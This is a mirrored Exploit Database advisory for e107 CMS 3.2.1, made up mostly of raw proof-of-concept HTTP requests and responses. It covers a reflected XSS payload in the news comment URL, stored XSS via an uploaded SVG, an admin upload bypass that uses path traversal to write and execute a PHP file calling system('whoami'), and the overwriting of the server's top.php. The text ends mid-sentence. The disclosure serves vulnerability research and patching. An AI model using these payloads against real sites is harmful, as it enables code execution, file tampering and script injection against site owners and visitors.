e107 CMS v3.2.1 – Multiple Vulnerabilities

• Exploit Database
• 119 阅读

• 作者： Hubert Wojciechowski
  日期： 2022-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50910/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222

  # Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities # Date: 30/04/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 3.2.1 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23   ### XSS Reflected - Via adding comment (Authenticated)   # POC Request: GET /e107/news.php/fnzi4&apos;onchange=&apos;alert(1)&apos;?extend.1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40   Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 08:02:42 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "71d7966eaa95fd8ac14da8baf3e0785d" Content-Length: 25059 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] <div class=&apos;media&apos; > <form id=&apos;e-comment-form&apos; method=&apos;post&apos; action=&apos;/e107/news.php/fnzi4&apos;onchange=&apos;alert(1)&apos;?extend.1&apos;> [...]   User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field   image.png     ### Upload restriction bypass (Authenticated [Admin]) + Stored Xss.   Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file) image->media manager->upload a file->Image/File URL admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg   # POC   Request: POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 90 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1   upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=   Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 02:06:14 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "06ed5ef56b0f736995112cafd77e9ec0" Content-Length: 20878 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8   <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] <div class=&apos;well clearfix media-carousel-item-container&apos;> <a data-toggle=&apos;context&apos; data-bs-toggle=&apos;context&apos; class=&apos;e-media-select&apos;data-id=&apos;&apos; data-width=&apos;0&apos; data-height=&apos;0&apos; data-src=&apos;https://www.exploit-db.com/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg&apos; data-type=&apos;image&apos; data-bbcode=&apos;img&apos; data-target=&apos;&apos; data-path=&apos;{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg&apos; data-preview=&apos;/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg&apos;data-preview-html=&apos;PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=&apos; title="xxe_svg2.svg ()" style=&apos;&apos; href=&apos;https://www.exploit-db.com/exploits/50910/#&apos; ><span><img class="img-responsive img-fluid" alt="" src="https://www.exploit-db.com/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span> </a> [...]   image.png     ### Upload restriction bypass (Authenticated [Admin])+RCE   Upload and execute .PHP file Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory.   image.png     Media Manager-> Media Upload/Import -> From a remote location   # POC   Request POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1   upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php   Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:02:08 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8   <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...]   We can see uploaded PHP file on the server side.   image.png     cmd.php file source:   <?php system(&apos;whoami&apos;); ?>   image.png     ### Upload restriction bypass (Authenticated [Admin])+ Server file override   Attacker can override example top.php file in the main directory of web application. Original file top.php in server: image.png     We can override file via following upload functionality: Media Manager-> Media Upload/Import -> From a remote location   # POC   Request: POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1   upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php   Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:20:10 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...]   top.php file content was tampered: